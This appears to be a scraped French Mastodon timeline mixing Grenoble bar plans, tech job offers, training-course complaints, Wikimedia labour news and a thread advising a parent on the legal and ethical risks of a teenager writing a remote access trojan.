@Maoulkavien @fabi1cazenave @oldsysops @PacoVelobs @Ilygad @sweetsumo @NuclearSquid @AnhkaaDNeige @metacosm @Thomas Pluie modérée à 17h (l’heure d’arriver au bar) et 23h (l’heure de repartir du bar) et Forte Pluie à 20h (l’heure d’être à l’abri au bar), moi je dis ça joue
@Maoulkavien @oldsysops @PacoVelobs @Ilygad @sweetsumo @NuclearSquid @ashiel @metacosm @Thomas
Ce soir ou demain ça m’est égal, je voudrais juste que @AnhkaaDNeige soit présent. Les autres je les aime moins. 😇
@fabi1cazenave @oldsysops @PacoVelobs @Ilygad @sweetsumo @NuclearSquid @ashiel @metacosm @Thomas @AnhkaaDNeige
De toute façons je suis pas dispo demain 😂
Ce soir il ya une chance que je me motive au moins !
@Maoulkavien @oldsysops @PacoVelobs @Ilygad @sweetsumo @NuclearSquid @ashiel @metacosm @Thomas @AnhkaaDNeige
Franchement, la pluie c’est relatif. J’ai remarqué qu’après 6 pintes, il ne pleut plus, ou quasi plus.
@fabi1cazenave @Maoulkavien @oldsysops @PacoVelobs @Ilygad @sweetsumo @ashiel @metacosm @Thomas @AnhkaaDNeige
Puis surtout le Bivouak y’a pleins de place dedans et y’a une partie de la terrasse qui est ouverte, donc osef non ?
@NuclearSquid @Maoulkavien @oldsysops @PacoVelobs @Ilygad @sweetsumo @ashiel @metacosm @Thomas @AnhkaaDNeige
Non seulement ça, mais ils ont de la Tropik’Ale. Je vois vraiment pas où serait le problème.
@Maoulkavien @oldsysops @PacoVelobs @Ilygad @sweetsumo @NuclearSquid @ashiel @metacosm @Thomas @AnhkaaDNeige
(C’est sûrement ça qui permet aux Nordistes et aux Bretons de survivre à la météo pourrie qui sévit par chez eux, d’ailleurs.)
@fabi1cazenave Awi, c'est le moment où on croit bien parler les langues étrangères ça.
@Maoulkavien @oldsysops @Ilygad @sweetsumo @NuclearSquid @ashiel @metacosm @Thomas @AnhkaaDNeige
@PacoVelobs @fabi1cazenave @oldsysops @Ilygad @sweetsumo @NuclearSquid @ashiel @metacosm @Thomas @AnhkaaDNeige
La fameuse "Bière de rosette", environ la 5ème ou 6ème pinte oui
@Maoulkavien @PacoVelobs @oldsysops @Ilygad @sweetsumo @NuclearSquid @ashiel @metacosm @Thomas @AnhkaaDNeige
C’est comme ça que j’ai appris l’allemand et l’espagnol. L’italien je galère, mes potos italiens ne picolant pas, bêtement.
@fabi1cazenave Je t'ai vu parler italien avec une romaine à Paris en m'expliquant que tu ne parlais ni italien ni roumain mais que vous arriviez tout de même à vous comprendre.
On en était qu'à deux pintes.
@Maoulkavien @oldsysops @Ilygad @sweetsumo @NuclearSquid @ashiel @metacosm @Thomas @AnhkaaDNeige
@PacoVelobs Ah oui, le roumain c’est particulier, ça peut être soit proche de l’italien soit très éloigné, mais la plupart des Roumain’es savent se limiter au sous-ensemble qui est proche de l’italien pour communiquer avec d’autres locuteurs de langues romanes. En tout cas, pas mal de Roumains que je croise me proposent de basculer à l’italien pour (essayer de) communiquer.
@Maoulkavien @oldsysops @Ilygad @sweetsumo @NuclearSquid @ashiel @metacosm @Thomas @AnhkaaDNeige
@PacoVelobs M’enfin oui, ne pas essayer ça sans au moins 4 ou 5 pintes, si on veut un minimum d’efficacité.
@Maoulkavien @oldsysops @Ilygad @sweetsumo @NuclearSquid @ashiel @metacosm @Thomas @AnhkaaDNeige
@PacoVelobs (Et si jamais les questions de proximité linguistique t’intéressent, agad’, c’est assez surprenant comment ces deux langues se ressemblent.)
https://en.wikipedia.org/wiki/Comparison_of_Italian_and_Romanian
@Maoulkavien @oldsysops @Ilygad @sweetsumo @NuclearSquid @ashiel @metacosm @Thomas @AnhkaaDNeige
@PacoVelobs @fabi1cazenave @Maoulkavien @oldsysops @Ilygad @sweetsumo @NuclearSquid @metacosm @Thomas @AnhkaaDNeige Ich bin Kartoffel
@ashiel @PacoVelobs @fabi1cazenave @Maoulkavien @oldsysops @Ilygad @sweetsumo @NuclearSquid @metacosm @Thomas @AnhkaaDNeige en bon allemand, je me dois de demander : „mehlig- oder festkochend?“
@TheyCallMeHacked @PacoVelobs @fabi1cazenave @Maoulkavien @oldsysops @Ilygad @sweetsumo @NuclearSquid @metacosm @Thomas @AnhkaaDNeige Déso tu m’as perdu, c’était l’intégralité de mes compétences en allemand
@ashiel @TheyCallMeHacked Fest ? Tu l’as bien regardæ ?!?
@PacoVelobs @Maoulkavien @oldsysops @Ilygad @sweetsumo @NuclearSquid @metacosm @Thomas @AnhkaaDNeige
@fabi1cazenave @TheyCallMeHacked @PacoVelobs @Maoulkavien @oldsysops @Ilygad @sweetsumo @NuclearSquid @metacosm @Thomas @AnhkaaDNeige J’sais pas pourquoi mais je sens qu’on m’insulte
@NuclearSquid @ashiel @fabi1cazenave @PacoVelobs @Maoulkavien @oldsysops @Ilygad @sweetsumo @metacosm @Thomas @AnhkaaDNeige tiens c’est quel traducteur ça ?
@NuclearSquid @ashiel @fabi1cazenave @PacoVelobs @Maoulkavien @oldsysops @Ilygad @sweetsumo @metacosm @Thomas @AnhkaaDNeige Ah j’avais pas reconnu l’interface
@fabi1cazenave @PacoVelobs @sweetsumo @NuclearSquid @ashiel @metacosm @Thomas J'ai malheureusement déjà une obligation ... au bivouak 😆
@AnhkaaDNeige @fabi1cazenave @PacoVelobs @sweetsumo @NuclearSquid @metacosm @Thomas Tu ne pourras donc pas ne pas être là à ton grand regret, si j'ai bien compris ?
@ashiel @fabi1cazenave @PacoVelobs @sweetsumo @NuclearSquid @metacosm @Thomas je serais a un autre apéro au même endroit donc oui du coup ca sera a regret. A moins que je fasse un puis l'autre 😁
@AnhkaaDNeige
Been elsewhere.
Done that.
It works.
@ashiel @fabi1cazenave @sweetsumo @NuclearSquid @metacosm @Thomas
@PacoVelobs @ashiel @fabi1cazenave @sweetsumo @NuclearSquid @metacosm @Thomas mon instance masto déconne grave, je n'arrive pas a récupérer les premiers messages. C'est à partir de quelle heure ?
@AnhkaaDNeige
On a pas donné d'heure mais je suppose que c'est le 19h habituel.
@ashiel @fabi1cazenave @sweetsumo @NuclearSquid @metacosm @Thomas
@oldsysops Arf, jamais cool ça
Soutine!
New, by me: Password manager giant Dashlane said hackers obtained some customers' password vaults during a weekend cyberattack by defeating the company's two-factor security protections.
bizarre (heureusement pas en "prod")
une recherche rapide m'indique que je suis pas le seul...
@oldsysops Vu le nom, ca ne ressemble pas vraiment à un piratage, mais plutôt une suspension, par le registre ou le bureau d'enregistrement, qui ont presque tous maintenant des procédures pour forcer la vérification des données. C'est une clause du contrat ICANN, cf par exemple: https://www.icann.org/resources/pages/5-things-registrants-know-wdrp-2017-08-30-en
@oldsysops @entrouvert bonjour ! Serez-vous aux JDLL ce weekend ?
Rejoignez-nous, on est sympa !
https://mastodon.libre-entreprise.com/@entrouvert/116651361333143503
#jeChercheDesCollegues #jeProposeUnJob #noAI #noIA #pythonFR #djangoFR #jeRecrute
@joachim
C'est exactement dans une boite comme ça que j'aimerais bosser.
Scop, salaire unique pour tout le monde, avantages pas mal du tout, projets intéressants, autour du libre, partout en France !
Je fais pas de python, du coup va falloir que j'en monte une pareil
@jeleb concernant le libre il y a le réseau Libre Entreprise (qui héberge l’instance masto où Entr’ouvert a son compte) : https://libre-entreprise.org/ , il y a peut-être des boîtes intéressantes :)
(Dans le réseau il n’y a pas que des SCOP, il y a des SCIC, des SAS-PO et des SARL…)
@joachim France obligatoire ou Belgique possible?
@joachim si vous voyez un boulet qui a posté 2 fois sa candidature (la première incomplète postée sans faire exprès) c'est moi 🙋
@oldsysops si c'est pour offrir une alternative libre et p2p à Teamviewer, je pense que l'ensemble de l'humanité lui sera reconnaissante 😉
@oldsysops oui, j'utilise Rustdesk, top.
Mais s'il arrive à développer un truc où y'a pas besoin de serveur, alors là je dis champion 😁
Et puis surtout j'essaie de trouver des arguments pour que tu le laisses pirater un truc, du moment que je peux valider la cible en amont, évidemment.
@oldsysops dis lui que le marché est saturé et que toutes les entreprises ont déjà été piratées.
Il comprendra qu'il n'y a plus de débouchés dans le piratage 
@oldsysops difficile à dire sans connaître son objectif, au minimum, il y a un risque de créer une faiblesse sur la machine contrôlée, sur le réseau local de celle-ci. Mais s'il en est à coder lui-même ce genre de choses, je pense qu'il connait les risques. Tant que la machine cible est consentante (comme avec Team Viewer), je ne vois pas le souci.
Si l'objectif est de créer un R.A.Trojan et donc de prendre malicieusement le contrôle d'une machine, ça dépendra surtout de comment c'est utilisé
@oldsysops la plupart des entreprises de sécurité en utilisent pour détecter les failles et les corriger. Si la machine cible est consentante, il n'y a toujours aucun souci particulier, au pire elle apprendra qu'elle est vulnérable à tel type d'attaque et pourra tenter de s'en protéger.
Si c'est utilisé pour attaquer des cibles non averties et non consentantes, là c'est plus la même mayonnaise bien entendu. Jeter un oeil aux règles de droit me semble une bonne idée.
Hello @oldsysops 😁
Mais laisse le faire, au moins il glande pas sur tiktok !
@oldsysops Ça vaut peut-être le coup d’aller récupérer les articles du code pénal applicable au fait de s’introduire et de se maintenir frauduleusement dans un système d’information. (J’ai plus les numéros d’articles en tête).
Vu que c’est encore un ado, il est un peu jeune pour aller bosser dans la Cyber Offensive de l’État, mais ça serait un débouché ou ses compétences pourraient être utile, sous réserve d’avoir un minimum d’éthique.
(Pour toi, je te recommande de jeter un œil au libre espionner, mentir, détruire, de Martin Untersinger)
@Sobex 323-1, 323-2, 323-3 @oldsysops
@jenesuispasgoth @oldsysops Thanks !
@Sobex de rien. Il y en a sans doute de nouveaux, ceux-ci datent des années 80-90 je crois bien. :) @oldsysops
@jenesuispasgoth @oldsysops Ils ont été modifiés récemment si j’en crois legifrance.
Pour moi ça reste les principaux articles sur le sujet.
1. S’il se fait prendre les conséquences peuvent détruire tout espoir d’avoir une carrière en informatique.
2. Même s’il ne se fait pas prendre par la justice, les services de Rens’ fouillent un peu le passé des gens avant d’habiliter et de recruter du personnel, donc s’ils trouvent des trucs trop suspects, ça peut aussi lui fermer des portes.
3. La Cyber Offensive étatique est le seul domaine dans lequel ses compétences peuvent être utilisées légalement. Accessoirement c’est un domaine qui recrute et est très actif.
Je crois qu’il peut déjà tomber sous le coup de l’Article 323-3-1, c’est chaud en fait.
VERSION EN VIGUEUR DEPUIS LE 20/12/2013
Modifié par LOI n°2013-1168 du 18 décembre 2013 - art. 25
Le fait, sans motif légitime, notamment de recherche ou de sécurité informatique, d'importer, de détenir, d'offrir, de céder ou de mettre à disposition un équipement, un instrument, un programme informatique ou toute donnée conçus ou spécialement adaptés pour commettre une ou plusieurs des infractions prévues par les articles 323-1 à 323-3 est puni des peines prévues respectivement pour l'infraction elle-même ou pour l'infraction la plus sévèrement réprimée.
brefs merci !
@oldsysops @jenesuispasgoth En réfléchissant, les mesures suivantes pourraient rendre le projet éducatif et moins dangereux :
- Avoir un dossier biblio clairs, possiblement des questions / objectifs spécifiés
- Rendre l’outil uniquement exécutable sur une liste de machine définies dans le code, sur lequel il est légitime de tester + probablement requérir par exemple une clef registre spécifique ou équivalent. (Genre le binaire fuite, c’est pas grave car il est difficilement exploitable).
- Rendre les modules exfiltrant des données non dangereux en exfiltrant, par exemple, le sha512 des MdP plutôt que les MdP eux même. (Tu démontre le bon fonctionnement sans être dangereux).
- Rendre la présence de l’outil visible au lancement (pop up).
- Hard-coder le CC de sorte à ce qu’il soit local / IP non routable.
- Ne pas mettre le code sur Internet, que ce soit privé ou public.
Je garanti pas que ça convainc un juge, mais c’est déjà une bonne précaution .
@oldsysops L’ado a un projet professionnel clair ou pas ?
Au niveau études, il s’oriente vers quoi ?
(À noter : le recrutement de l’état dans le domaine est pas mal au niveau master (requis pour ASC Cyber, statut civil plus avantageux à la DGA, Com Cyber et autres entités du Min Arm).
L’exception notable est le recrutement militaire ou le personnel est plutôt sous-officier (Com Cyber, 44 RI, et autres unités de Guerre Elec).
Le statut ASC Cyber permet en principe une mobilité de carrière dans les divers entités faisant de la Lutte Informatique (Defensive comme Offensive))
Mais bref, il a probablement intérêt à avoir un diplôme Master / Ingé pour aller dans cette voie.
@oldsysops
Construire c'est parfait pour comprendre et ensuite lutter contre. Je suis de tout cœur avec lui.
@oldsysops etre péda et sécu (mais peu être un poil militariste) ilsy asqe challange passe ton hack https://www.education.gouv.fr/passe-ton-hack-d-abord-le-plus-grand-challenge-cyber-de-france-va-mobiliser-pres-de-10-000-lyceens-469325
@oldsysops le RAT, ce n’est pas un problème. C’est ce que tu veux en faire qui est important. Si c’est pour comprendre comment ça marche pour mieux s’en défendre et/ou l’utiliser en pentest, pas de soucis. Je dirais même que c’est un bon moyen d’étudier les techniques d’évasion…
Dans la même situation je solliciterais un avis éclairé à @cryptax
Il y a du fun autours des CTF et trouver les failles, il faut savoir quelles sont les règles qui nous placent du côté des criminels, le plus tôt et le mieux...
@artlog @oldsysops c'est un peu cliché tout ça, mais j'ai supposé que tu parlais à un jeune/ado/étudiant et forcément la.morale ça marche moyen...
@oldsysops mmm j'ai plein d'arguments, mais je ne sais pas si ça touchera un ado (je suppose que c'est un ado ou un jeune ?)
1) "c'est trop fastoche, si tu veux vraiment prouver que t'es fort, fais l'inverse écris un truc qui bloque les rat"
2) "bonne idée pour ne plus pouvoir être embauché par des boîtes d'AV ou des CERT"
@oldsysops 3) "tu veux prouver tes compétences ? Gagne un CTF"
Je serai aux #JDLL2026 pour deux choses :
- une conférence avec mon collègue Thomas dans laquelle on raconte comment ça se passe à @CodeursEnLiberte, coopérative sans lien de subordination - le samedi à 15h
- j'apporterai quelques jeux sur les risques psychosociaux destinés aux collectifs horizontaux pour pouvoir les tester : https://www.codeureusesenliberte.fr/blog/rps-enliberte/
Et puis c'est l'occasion de voir des gens chouettes, aussi <3 <3 <3
Et de faire un peu de bénévolat pour les @jdll parce qu'iels en ont besoin !
@Julie_
Si ya pas de lien de subordination il n'y a pas de salariat non ? J'ai cherché sur le site mais rien vu sur ce sujet. Aussi interressé par des détails sur la présidence tournante :)
@CodeursEnLiberte @jdll
RE: https://boitam.eu/@joachim/116651400114070953
Job développeur·euse Python/Django en coopérative télétravail à 100% possible. Garantie sans IA. CDI de 52 000 € brut annuel.
Et c'est un 4/5 donc en 100% ça donnerait 65k annuel brut
Superbe offre
oldsysops a repartagéRejoignez-nous, on est sympa !
https://mastodon.libre-entreprise.com/@entrouvert/116651361333143503
#jeChercheDesCollegues #jeProposeUnJob #noAI #noIA #pythonFR #djangoFR #jeRecrute
@charles oui
- iels le savent
- bof
- aucune idée
On est trop payé par rapport à notre bénéfice pour la société mais sous payé par rapport à ce qu'on rapporte au patronat. Le salaire est un enjeux capitaliste sur lequel il faut lutter pour son partage. Ça commence par viser le patronat plutôt que les camarades de lutte.
Le don et l'abonnement c'est de l'acte individuel et non collectif. C'est pas là que j'insiste le plus.
@charles C'est pas pour rien que nous ne sommes que 2% de syndiqué'es dans le numérique. À Solidaires Informatique, on finance ce qu'on peut dans la lutte et une grosse partie du reste par en dons divers (surtout associatif en accord avec nos valeurs).
Bref encouragé vos connaissances dans l'informatique à se syndiquer et on aidera à les conscientiser.
Si tu veux une idée voici quelques dons que nous avons fait dans le passé https://codeberg.org/OpenZbeul/don
Offre non contractuelle... mais on est drôle !
https://boitam.eu/users/joachim/statuses/116651400114070953
L’équipe Entr’ouvert s’agrandit encore : nous recrutons un·e développeur·euse Python/Django.
Consultez l'offre et candidatez avant le 7 juin : https://www.entrouvert.com/actualites/2026/embauche-developpeureuse-python-django-2026/
Bonjour,
En tous cas votre façon de décrire les risques professionnels spécifiques à une SCOP et au travail isolé est vraiment super !
Bon, la séance de télécours étant follement passionnante aujourd'hui, j'ai fait mes tâches ménagères... dont le rangement du bureau.
Je n'ai toujours pas retrouvé ma CB que je pensais avoir perdu dessus / dedans 😢
Je sens que je vais être obligée d'étendre et ranger le linge pour continuer à m'occuper 😞
J'ai donc étendu le linge, réservé le cadeau d'anniversaire du mari... pas de 2026, mais de 2025 ;-)
Et j'ai même terminé de prendre mes mesures pour @lhaulde qu'elle attend depuis... le 11 février !
Normalement, j'ai plus ou moins fini de glander, on devrait passer au devoir final dans une quinzaine de minutes 😞
Je continue les cours de réseau, avec le prof qui parle super lentement, ne termine pas ses phrases, et dont le contenu des cours est impossible à prendre en note 😞
Aujourd'hui, on découvre le site d'exercices de Cisco, et on regarde le prof faire des exercices en direct. YOUPI !
Faudrait que je passe l'aspirateur ou que je range le linge, je ne sais pas ce qui est le plus ennuyeux : écouter le cours, ou trier le linge 😭
Trois jours de formation sur la gouvernance et #Cobit
Nous sommes 48 élèves, à distance, et le prof commence par... un tour de table de présentation 😭 On en est à la lettre H 😱
On est supposé se présenter en 1min, mais il rajoute bien 3 ou 4 min de commentaires quasi à chaque fois. C'est long
@Elizabeth un tour de table pour 48 personnes ? 😂 courage !
@pasqualeberesti c'est looooong !!!
@Elizabeth tu m'étonnes ! déjà quand y a 10 personnes, c'est infernal, car PERSONNE ne respecte le temps de parole proposé, alors 48... bwââââââ !
Le prof a suggéré qu'on parle aussi un peu de ses loisirs, si on le souhaite.
C'est étonnant, les seuls qui le font sont... les mecs !
Le mec est lucide. C'est l'heure de la pause : "pour ceux qui font la sieste, ben continuez. Pour les autres, à dans 30min"

@Elizabeth Oh bah perso je faisais la sieste au premier rang en amphi, les profs me réveillaient gentiment à la fin du cours ou quand y’avait un contrôle.
Tant qu’on dérange pas le cours, ils préfèrent encore qu’on dorme plutôt qu’on bavarde, visio ou pas ^^. Après tout c’est notre avenir, pas le leur :D Ils sont payés pareil à la fin (et dans mon cas, les résultats étaient là, ok, je dors en amphi mais je bossais en TP/TD)..
en bonne ménagère de 45 ans, j'ai donc profité de la pause pour lancer une machine, lancer du riz au lait, et... c'est tout en 30min, tellement je suis une larve avec la chaleur.
Et encore, je ne crève plus de chaud depuis les travaux de rénovation de la résidence... La preuve, je peux même ouvrir les volets du côté Est, les fenêtres ne sont pas brûlantes.
Aujourd'hui, le mari est aussi en télétravail, je me suis réfugiée dans la chambre de Claude, la pièce la plus fraiche de l'appartement, et ça fait du bien !
Sauf que... je m'ennuie, et je ne peux pas faire trop de choses dans l'appartement pour ne pas le déranger.
Qu'est-ce que je pourrais bien faire ? Lire tous mes signets masto est compliqué, parce que j'écoute le cours d'une oreille malgré tout.
Remarque, si vous avez de bons sites pour mieux comprendre #cobit, je prends !
@oldsysops de ce que j'ai lu, c'est complémentaire avec l'ISO.
Tu dis que tu as une formation sur l'ISO, c'est parce que tu travailles dans ce domaine ou que tu vas en suivre une ?
@oldsysops @Elizabeth mandieu je viens de découvrir ce terme et me suis arrêté très vite sur la page wikipedia.
Non pas que je trouve ça inutile en vrai mais ce genre de truc me hérisse le poil depuis qu'au boulot on nous a fait perdre énormément de temps (précieux) en foutaises pour remplir des excel insipides afin d'obtenir un iso9001 sans résoudre aucun des problèmes d'organisation que tout le monde (enfin ceux qui bossent) connaissent et rapportent depuis des années. Et maintenant ? En route pour le 27001 !
Vers l'infini et au delà!
La nouvelle directrice de la fondation Wikimédia étant issue de l’oligarchie du capitalisme financier, elle vient de commencer à dérouler le seul manuel qu’elle connaisse : l’exploitation par l’abus de pouvoir.
Elle a donc viré toute l’équipe de dev. Le cœur historique du projet. Ceux en charge du produit de base. Toute l’équipe.
La fondation manque d’argent ? Ah non, elle n’a jamais été aussi riche (elle peut se payer des directeurs aussi chers, par exemple).
[…]
[…]
Est-ce que c’est la culture locale ? Pas forcément, même si la directrice précédente avait aussi merdé en abusant de son pouvoir.
L’IA va tout remplacer ? On ne sait pas vraiment avec ce genre de crétine capitaliste, c’est bien possible.
Non, c’est plus simple : les travailleureuses demandaient des trucs.
Est-ce qu’iels abusaient ? Des demandes irréalistes ? Du harcèlement contre le gentil management ?
[…]
[…]
« Transparence et responsabilité de la direction tant envers le personnel qu'envers la communauté. Une véritable participation du personnel à la planification annuelle avant que les décisions ne soient finalisées. La fin des pratiques incohérentes en matière d'embauche, de licenciement et de promotion. La possibilité d'exprimer librement ses divergences d'opinion. Un soutien en matière de santé mentale pour les travailleurs qui sont en contact direct avec la communauté. »
[…]
[…]
Wow, à la limite de demander un traitement humain, dis-donc 😭
Oui mais voilà, iels ont demandé tout ça EN SE SYNDIQUANT.
Et aux USA, pour une direction capitaliste (même d’une fondation à but non lucratif), c’est un blasphème.
[…]
[…]
Pourquoi est-ce que les gens devant choisir des dirigeants finissent toujours par se laisser avoir par le mirage de compétence de l’oligarchie capitaliste ? Je ne sais pas. Ça me dépasse, honnêtement.
Mais ça se finit TOUJOURS pareil.
Bref, signez la pétition de soutien : https://en.wikipedia.org/wiki/Wikipedia:Wiki_Workers_United_solidarity#Signatures
[␄]
@nojhan plutôt celle sur Meta, non ? https://meta.wikimedia.org/wiki/Wiki_Workers_United#Solidarity
@nojhan Mais qui l'a embauché, du coup ?
@sarah_trichet_allaire Le board. Qui est censé être élu par la communauté (« censé » parce qu’il y a eu des trucs pas nets). Mais c’est une évolution classique : dans un système qui s’encroute (tels que la WMF), les candidats sont issus d’un biais de classe, les élus encore plus. Iels sont donc sensibles aux indices de « compétence » du milieu des affaires (titres ronflants, prestige, grosses sommes, etc.), ont peu de compétences en analyse politique et sont sensibles à l’autorité.
Ne pas lire ses mails de taff : j'ai une réu politique avec des clients demain à 10h30.
Je suis présent pour l'image technique.
Ma journée est foutue.
Ma webcam vient de m'envoyer un mail pour me dire qu'elle ne fonctionnera pas demain par solidarité et qu'il est possible que le micro ne soit pas dans sa meilleure forme.
Fuck.
@oldsysops il fait 79°, je vais pas mettre de sweat !
Et pour la webcam : elle est en RTT.
On va faire au mieux 🤗
Pour accompagner son développement, et dans l’optique du renforcement de son pôle technique, Reporterre recherche un·e développeur·se fullstack ou front-end
Candidatures jusqu'au 14 juin.
Plus d'informations ➡️ https://l.reporterre.net/1Tm
Power bills to fall by up to 10% in July as renewables and batteries soar across Australia https://www.theguardian.com/australia-news/2026/may/26/power-bills-drop-fall-australia-energy-default-market-offer #Energy #Environment #AustraliaNews #AustralianPolitics #LaborParty
Dans votre expérience professionnelle, les gens que vous connaissez qui se sont le plus engagés en faveur de l’IA, qui l’utilisent le plus et qui en parlent le plus, ils sont en :
(les âges sont à titre indicatif)
(les gens que vous connaissez = relation à 1 ou 2 degrés de séparation, pas les journalistes ou influenceurs linkedin)
| Début de carrière / jusqu’à 30 ans: | 8 |
| Milieu de carrière / 30 à 50 ans: | 28 |
| Fin de carrière / 50 à la retraite: | 9 |
Terminé
:-p
@oldsysops tu entendrais ce qu’en dit mon patron 
@joachim dans tous les niveaux il y a des pours et des contres. Mais dans le niveau des très juniors ce n’est pas une question. C’est un outil comme les autres.
il a pas (encore) de serveur a lui donc j'espère que ca restera théorique !
Moment pub pour un CHATON belge!
Nubo, mail et cloud éthique!
www.nubo.coop
L'utiliser, c'est l'adopter!
[A partager] Vous en avez marre de lire « c’est normal, c’est l’été » (un argument claqué au sol car c'est le printemps !) ? Désormais, TOUTES les grandes métriques du changement climatique en France métropolitaine sont publiques, gratuites, téléchargeables et partageables. 1/4
@infoclimat.fr et @dataforgoodfr.bsky.social@bsky.brid.gy lancent l’un des portails les plus complets jamais réalisés en France sur l’évolution du climat : dataclimat.fr ➡️Notre objectif ? Combattre la désinformation climatique par la science et par les faits. ➡️Notre devise ? Les faits, rien que les faits. 2/4
Journalistes, enseignants, associations, créateurs de contenus, citoyens : appropriez-vous les données. Analysez-les. Partagez-les. Vérifiez les affirmations par vous-mêmes. dataclimat.fr 3/4
Températures, vagues de chaleur, indicateurs climatiques, déséquilibre des records, tendances de fond : ON A BESOIN DE TOUT LE MONDE. Partagez le lien autour de vous. dataclimat.fr 4/4
i do think it's funny that any company that wants a huge influx of extremely good engineers could just say "we are not doing ai" on the careers site
#GetFediHired Our team at Fable is looking for a Staff Software Backend Engineer (10 years+) familiar with #python and #django in one of various US cities, Canadian cities, or Mexico City.
https://jobs.ashbyhq.com/ScribdInc/450391bf-4fb2-4fae-9acd-96851c7e82e3?utm_source=BDVAEvOEqo
bon j'ai une question pour les fedinautes de #grenoble :
je serais debut juin (la semaine du 1er exactement) sur #grenoble, est ce qu'il y a des restaurant sympa ou des bars interessant à [v|b]oire dans le coin?
je suis sur que oui !
Sinon pour etre plus spécifique est-ce qu'il y a un restaurant, recommandable, accessible à pied de la gare, qui accepte les groupes + de 10 personnes et qui est ouvert le lundi soir ?
je serais pas tous seul à grenoble, j'aurai surement quelques collègues (que je ne taggue pas pour préserver leur identité secrête) qui seront avec moi...
de la à dire qu'on pourrait faire un #mastoApero c'est peut etre s'avancer un peu (mais mardi soir j'ai encore rien de prévu)
#askFedi
@oldsysops
Proche gare et qui prend des groupes le lundi tu auras simplement la Ferme à Dédé pour de la bouffe locale mais pas diététique.
Niveau bar, le PTit Labo est cool mais pas très grand.
@PacoVelobs @oldsysops Pour les restos je sais pas, mais pour les bars j’ai des opinions.
Je plussoie vivement le P’tit Labo. Ils brassent les meilleures bières de Grenoble, à mon humble avis.
Dans le même quartier, j’aime bien le Commun des Mortels.
Dans le centre-ville, le Neptune pour les bières atypiques (fruitées) ou la Crique Sud pour leur Tropic’Ale dont je ne me lasse pas.
Et le plus grenopolitain de tous : le Bivouak, quartier MC2, dans un tiers-lieu et tenu par l’équipe de la Crique.
en tous cs merci a vous 2 !!
@oldsysops Les camarades ont déjà donnés plein de bons plans mais j'ajoute quand même :
- Locafé (proche du P'tit labo), bon restaurant végé/végan, réservation et organisation pour un groupe à prévoir
- Coq'tail (plus loin de la gare mais bar sympa aussi)
- Le Square (à côté de la Crique) sympa aussi !
Pas un restaurant mais il y a Falafel & Co à Sassenages qui fait des Falafels vraiment bons (ils ont pas de magasin, mais si tu prends contact avec eux, ils peuvent te donner rendez-vous pour que tu ailles chercher le ou les paquets commandés - ça commence à 125 g je crois).
apt update && apt dist-upgrade && reboot
Et vous, cette semaine ?
@bortzmeyer pareil… faut que je creuse kexec car les serveurs mettent quand même une plombe au reboot.
Dommage qu’il n’y ait pas de livepatch du kernel Debian/proxmox comme le propose Ubuntu
@oldsysops c'est comme google docs mais libre, c'est ça ?
@oldsysops sur ce coup-là je t'ai précédé il y a quelques semaines. J'ai eu quelques soucis de reverse-proxy également mais pas tout à fait la même config. Si j'ai bien compris il faut que nextcloud et le client puissent tous les 2 accéder avec la même url de type https://office.mondomaine.fr et ensuite ça fonctionne trés bien en effet c'edt bluffant.
Cette annonce ne s’adresse pas aux agences de recrutement, prestataire, SSII.

Octopuce est une entreprise qui assure des missions d’hébergement et d’infogérance de serveurs sur mesure.
Nous cherchons une administratrice ou un administrateur système disposant d’une bonne connaissance du monde du logiciel libre, de préférence expérimenté.e. Nous cherchons une personne qui s’intègre bien dans une équipe de passionnés aux compétences diversifiées. Nous valorisons l’envie, l’engagement dans le monde du logiciel libre, la curiosité, l’apprentissage continu, l’esprit d’équipe et le sens du service rendu au client autant que la rigueur et la virtuosité technique. Une grande motivation et la capacité d’apprendre au sein d’une équipe peuvent compenser une expérience moindre. Les profils débutants et les parcours atypiques sont bienvenus.
La mission consiste à gérer des infrastructures Debian Gnu/Linux en déploiement automatisé avec un contact clients direct, ce qui implique du provisionnement / migration / mise à jour de machines et de de services, de l’écriture de code pour les outils et le monitoring ainsi qu’un travail de support à la complexité très variable.
À cela s’ajoute des tâches ponctuelles de gestion réseau, R&D d’administration système, déploiement matériel…
Octopuce est en cours de certification ISO27001, nous cherchons des personnes ayant un esprit d’amélioration continue et une véritable rigueur pour le respect des procédures.
Notez qu’à l’heure actuelle l’utilisation de l’IAg au sein d’Octopuce est proscrite.
Enfin, l’équipe actuelle d’Octopuce (13 personnes) est en télétravail. Afin de conserver et améliorer notre savoir-faire, l’équipe de réunit à Paris une semaine tous les 2 mois.
Poste: CDI Temps plein (35h)
Lieu : 90% télétravail, prévoir un aller-retour à Paris une semaine tous les 2 mois, déplacement et hébergement pris en charge par Octopuce. Possibilité de travailler dans nos bureaux à Paris.
Période d’essai : 4 mois renouvelable
Date de début : Dès que possible
Rémunération : entre 45 et 55K€ brut annuel (plus si profil expert), statut Cadre convention Syntec
Niveau : Bac +2 ou supérieur en informatique ou scientifique, ou autodidacte confirmé
Descriptif du poste (variable selon profil)
Compétences requises
Envoyer CV et lettre de motivation à recrutement @ octopuce.fr
en tous cas ca a l'air d'un super poste !
google had to level up by killing RSS and XMPP before they could gain enough XP to kill email.
once they're done with that they will move on to the final boss of killing the web.
@technomancy@icosahedron.website @technomancy@hey.hagelb.org I guess they haven't had enough time to kill RCS and SMS yet
@technomancy They already tried to vocally kill email eons ago with Google Wave which was proudly built on #xmpp.
@technomancy they tried with Wave, and failed painfully, but it might have been long enough they'll try again.
La Quadrature du Net recrute !
Nous cherchons sur Paris une personne ayant une appétence pour la compréhension et la vulgarisation des systèmes techniques et de leurs impacts politiques, qui pourrait nous aider à construire et diffuser notre analyse politique et à mobiliser sur nos sujets. ⬇️
Votre mission sera de participer à la construction et à la diffusion de l'analyse politique de La Quadrature. Dans un premier temps, vous travaillerez sur le thème de l'IA et des algorithmes de contrôles utilisés par les administrations sociales (notre campagne « France Contrôle »), mais vous aurez vocation à évoluer ensuite sur d'autres thématiques.
Concrètement, nous cherchons quelqu'un qui a de l'expérience en matière de vulgarisation des sujets techniques ou bien en matière d'animation de réseaux. Si vous savez notamment faire de la veille politique et médiatique, travailler en équipe, parler anglais, et êtes bien entendu intéressé·e par nos sujets, alors venez postuler !
Le poste est à Paris, mais le télétravail ponctuel est possible. Les candidatures sont ouvertes jusqu'au 21 juin, et nous commencerons les entretiens dès début juin. Alors si vous voulez nous rejoindre pour réfléchir, agir et construire une alternative critique à l'utilisation dominante et répressive des technologies, envoyez nous votre candidature ! \o/
@LaQuadrature "télétravail ponctuel", c'est combien de jours par semaine/mois ? 😇
